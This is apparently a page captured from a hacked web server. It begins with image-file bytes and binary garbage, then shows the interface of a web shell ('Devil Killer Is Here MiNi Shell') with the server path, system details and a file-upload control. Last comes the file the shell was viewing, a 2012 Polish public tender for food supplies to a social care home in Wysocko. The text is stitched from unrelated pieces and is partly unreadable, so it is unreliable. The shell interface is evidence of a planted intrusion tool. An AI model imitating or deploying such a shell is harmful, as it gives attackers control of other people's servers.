JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120619/208708-N-2012.html

<p class="kh_header"><b>Laszki: Dostawa artykułów spożywczych do DPS w Wysocku w II półroczu 2012r.</b><br>
<b>Numer ogłoszenia: 208708 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Wysocku , Wysocko 2, 37-543 Laszki, woj. podkarpackie, tel. 016 6285357.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.ipzp.pl/dpswysocko</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do DPS w Wysocku w II półroczu 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia obejmuje dostawę artykułów spożywczych według Kodu CPV - 15.00.00.00-8 w następujących kategorii: 
Kategoria Nr 1 - dostawa WARZYW, OWOCÓW , JAJ     
Kategoria Nr 2 - dostawa WĘDLIN I MIĘSA         
Kategoria Nr 3 - dostawa NABIAŁU                        
Kategoria Nr 4 - dostawa MROŻONEK I KONSERWY RYBNYCH  
Kategoria Nr 5 - dostawa PIECZYWA                    
Kategoria Nr 6 - dostawa POZOSTAŁYCH RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH, 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamówionego towaru.
Zamawiający będzie składał Wykonawcy sukcesywne zamówienia przekazywane faxem lub telefonicznie  i potwierdzone faxem następnego dnia .
Zamówienie będzie składane z 2 - dniowym wyprzedzeniem przed ustalonym terminem dostawy. Osobą upoważnioną do składania zamówienia jest Starszy Magazynier.
Wykonawca dostarczy towar bez względu na wielkość zamówienia w ciągu 2 dni roboczych licząc od dnia otrzymania zamówienia.
Zamawiany towar Wykonawca dostarczać będzie na własny koszt do magazynu DPS w godz.
od 7 do 11.
Wykonawca zobowiązany jest dostarczyć zamówiony towar w opakowaniu zapewniającym odpowiednie warunki sanitarne oraz zabezpieczającym go przed zniszczeniem lub uszkodzeniem, transportem spełniającym wymagania higieniczno - sanitarne. Dla wyrobów mleczarskich i mięsa Wykonawca zobowiązuje się do zachowania tzw. Ciągu chłodniczego, tj. przechowywania i transportu wyrobów w urządzeniach spełniających warunki techniczne przewidziane w polskiej normie.
Zamawiający zobowiązany jest każdorazowo w obecności przedstawiciela Wykonawcy dokonać ilościowego i jakościowego odbioru towaru, który potwierdza przez pokwitowanie dowodu dostawy.
1.Zamawiający zobowiązuje się do zbadania towaru podczas odbioru i dokona sprawdzenia :
         	1.1 Warunków transportu, w tym czystości środka transportu  opakowań i inne  
            warunki mające wpływ na jakość zdrowotną przewożonych artykułów oraz sposób   
            wyładowania zapobiegający ich zanieczyszczeniu
            1.2 Dokumentacji dotyczącej dostarczonych artykułów spożywczych , w tym  
             pochodzenia, producenta, daty produkcji i świadectwo kontroli jakości.
            1.3 Opakowań zbiorczych i jednostkowych: obce zapachy, uszkodzenia ,  
             zawilgocenie, bombaż puszek, obecności szkodników itp.
            1.4 Znakowania artykułów spożywczych, a zwłaszcza terminu przydatności                     
            do spożycia i daty minimalnej trwałości, czytelności i trwałości znakowania,
            1.5 Cech organoleptycznych, widocznych zanieczyszczeń, zapleśnienia,           
             szkodników itp.
            2.W przypadku niedochowania powyższych wymogów Wykonawca ma obowiązek 
            uznania reklamacji jakości dostarczonego towaru i na własny koszt jest zobowiązany    
            wymienić towar na pełnowartościowy, nie budzący żadnych zastrzeżeń oraz w razie 
            potrzeby zastosować inny środek transportu.   
2. Odpowiedzialność za dostarczany i odbierany towar określa moment odbioru towaru 
( przekazania)
3.	 W razie stwierdzenia braków Wykonawca uzupełni towar w tym samym dniu lub najpóźniej
następnego dnia bez żadnej dopłaty.
4. Wykonawca zobowiązuje się dostarczać towar dobrej jakości tj. świeży, I gatunku, czysty, bez obcych zapachów o właściwej gramaturze oraz z właściwym terminem przydatności do spożycia
5.Termin przydatności dostarczonego towaru ma być nie mniejszy niż 50 % całkowitego okresu przydatności do spożycia.
6.Towar będzie oznaczony zgodnie z obowiązującymi przepisami. Musi posiadać na opakowaniu opis i cechowanie określające jego właściwości. Opakowanie nie powinno wskazywać oznak uszkodzeń mechanicznych. Towar nie może wykazać oznak nieświeżości, przemrożenia bądź zepsucia.
7.  W celu potwierdzenia jakości dostarczanego przez Wykonawcę towaru Wykonawca zobowiązany jest do przedłożenia Zamawiającemu dokumentacji dotyczącej artykułów spożywczych, określających w szczególności ich pochodzenie, producenta, datę produkcji, świadectwo kontroli jakości (Handlowy Dokument Identyfikacyjny)
8. Brak wymaganych dokumentów wstrzymuje zapłatę za dostarczony towar.
9. W razie stwierdzenia przy odbiorze towaru , że nie odpowiada on zamówionemu
asortymentowi lub nie spełnia norm jakościowych, zamawiający ma prawo odmówić jego
odbioru, a Wykonawca zobowiązany jest niezwłocznie do dostarczenia nowego towaru.
10. W razie dostarczenia towaru złej jakości, której nie można było stwierdzić w trakcie odbioru towaru odbiorca ma prawo złożenia pisemnej lub telefonicznej reklamacji w ciągu 24 godzin od jego wykrycia, a Wykonawca jest zobowiązany wymienić reklamowany towar na wolny od wad..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 03.21.21.00-1, 03.14.25.00-3, 15.13.11.30-5, 15.13.11.35-0, 15.11.10.00-9, 15.11.00.00-2, 15.50.00.00-3, 15.88.10.00-7, 15.43.00.00-1, 15.22.10.00-3, 15.20.00.00-0, 15.33.11.70-9, 15.11.20.00-6, 15.23.40.00-7, 15.81.10.00-6, 15.84.23.00-5, 15.33.22.00-6, 15.85.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający wymagania określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i nie podlegają wykluczeniu z udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 wyżej wymienionej ustawy.
2.	Wykonawca ubiegający się o udzielenie zamówienia musi spełniać warunki udziału w postępowaniu dotyczące:
1)	posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym
      i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy
3.    Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od
       charakteru prawnego łączących go z nim stosunków.
4.    Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia,
       w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w 
        rozdziale VI niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać 
        jednoznacznie, iż w/w warunki wykonawca spełnia. Uzupełnienie wymaganych
       dokumentów jest możliwe po upływie terminu składania ofert stosownie do treści art. 26 
       ust. 3 ustawy z dnia 29 stycznia 2004r. Pzp.
5.    Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń
       lub dokumentów potwierdzających spełnienie przez Wykonawcę warunków udziału   
       w postępowaniu lub spełnianie przez oferowane dostawy, usługi wymagań określonych 
        przez Zamawiającego, lub którzy złożyli ww. dokumenty zawierające błędy, do ich 
        uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy
        podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
6.     Oświadczenia lub dokumenty wymienione w powyższym punkcie 5 muszą potwierdzać  
        spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez
        oferowane dostawy, usługi wymagań określonych przez Zamawiającego, nie później niż w 
        dniu, w którym upłynął termin składania ofert.
7.     Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (złożyć wspólną ofertę).
8.     Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcja, spółki cywilne  
        Winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  
         zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 
         zamówienia publicznego.
9.      W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
          - brak podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy
          w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień  publicznych 
musi zostać wykazany przez każdego z Wykonawców.
10.    Oferty wykonawców, którzy wykażą spełnianie wymaganych warunków zostaną  
         dopuszczone do badania i oceny.
11.    Wykonawcy, którzy nie wykażą spełniania wymaganych warunków zostaną wykluczeni  
          z postępowania.
        Oświadczenia i dokumenty,  jakie mają dostarczyć wykonawcy w celu 
        potwierdzenia spełnienia warunków udziału w postępowaniu oraz w celu wykazania  
        braku podstaw do wykluczenia z postępowania o udzielenie zamówienia.

1.	W celu potwierdzenie spełnienia warunków udziału w postępowaniu o zamówienie 
   publiczne Wykonawcy muszą przedstawić  w swojej ofercie następujące oświadczenia
   i dokumenty: 
         1)  Oświadczenie, że Wykonawca spełnia warunki w zakresie określonym w art. 22 ust. 1
ustawy Prawo zamówień publicznych, sporządzone według wzoru stanowiącego Załącznik Nr 4 do SIWZ;
      2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24, ust. 1ustway Pzp Zamawiający wymaga złożenia w ofercie następujących oświadczeń i dokumentów:
         1)    Oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania o 
                Udzielenie zamówienia, sporządzone według wzoru stanowiącego Załącznik Nr 5 do 
                SIWZ;
2)    Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt 2 ustawy; sporządzone według wzoru (wzór Załącznik Nr 6 do SIWZ);
    3)  Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,
               że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał
przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
          4)  Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub 
Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Złożyć pisemną ofertę wraz z nazwą oferenta, jego adresem, nr NIP, nr REGON, tel., fax. Oferta ta powinna zawierać cenę opału wraz z dostawą do zamawiającego podaną cyfrowo wartość netto i brutto wszystkich razem produktów wykazanych w załączniku nr 1, wartość brutto słownie Załącznik Nr 1- Formularz ofertowy
4. Wypełniony i podpisany  Załącznik Nr 2- Formularz cenowy.     
     5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w niniejszym rozdziale pkt 2, pakt. 2, 3 i 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
   1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
   2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
    3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
6. Dokumenty określone powyżej w pkt 5 pkt 1 i 3 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert, natomiast dokumenty, o których mowa powyżej w pkt 5 ppkt 2 powinny być wystawione nie wcześniej niż 3 miesiące przed terminem składnia ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dostarczy artykuły spożywcze do magazynu DPS w Wysocku własnym transportem na własny koszt.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/dpswysocko<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Wysocku; 37-543 Laszki; powiat jarosławski;       woj. podkarpackie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2012 godzina 09:00, miejsce: Dom Pomocy Społecznej w Wysocku; 37-543 Laszki;
Sekretariat  - Budynek Administracyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> warzywa, owoce i jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw, owoców i jaj w asortymencie i ilości 1.	Pietruszka	Kg	100
2.	Marchew	Kg	500
3.	Cebula	Kg	250
4.	Buraczki ćwikłowe	Kg	350
5.	Fasola  Jaś	Kg	30
6.	Kapusta czerwona	Kg	80
7.	Kapusta biała	Kg	380
8.	Ogórki kiszone	Kg	40
9.	Kapusta pekińska	Kg	180
10.	Pomidory	Kg	250
11.	Ogórek zielony	Kg	200
12.	Pory	Kg	140
13.	Natka pietruszki (pęczek)	Szt.	120
14.	Koperek zielony (pęczek)	Szt.	160
15.	Sałata zielona	Kg	60
16.	Seler	Kg	200
17.	Szczypiorek	Szt.	160
18.	Mak niebieski	Kg	2
19.	Papryka swieża	Kg	20
20.	Kapusta kiszona	Kg	160
21.	Pieczarki świeże	Kg	60
22.	Susz koperku (20 g)	Szt.	20
23.	Susz natki pietruszki 20 g	Szt.	20
24.	Czosnek	Kg	10
25.	Ziemniaki	Kg	6000
26.	Banany	Kg	300
27.	Pomarańcze	Kg	100
28.	Jabłka	Kg	700
29.	Cytryny	Kg	15
30.	Klementynki	Kg	200
31.	Jaja	Szt.	7000
32.	Żur naturalny (500g)	Szt.	100
33.	Brokuł świeży	Kg	60
34.	Śliwki	Kg	100
35.	Mandarynki	Kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 03.21.21.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WĘDLINY I MIĘSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wędlin i mięsa w asortymencie i ilości:1.	Szynka drobiowa	Kg	60
2.	Szynka wieprz. Extra	Kg	20
3.	Kiełbasa szynkowa wp. extra	Kg	70
4.	Kiełbasa zwyczajna	Kg	130
5.	Kiełbasa parówkowa	Kg	70
6.	Kiełbasa krakowska parzona	Kg	80
7.	Kiełbasa wiejska	Kg	30
8.	Kiełbasa lencz	Kg	80
9.	Kiszka gryczana wiejska	Kg	50
10.	Pieczeń myśliwska	Kg	120
11.	Pasztet luzem wp. delikatesowy	Kg	60
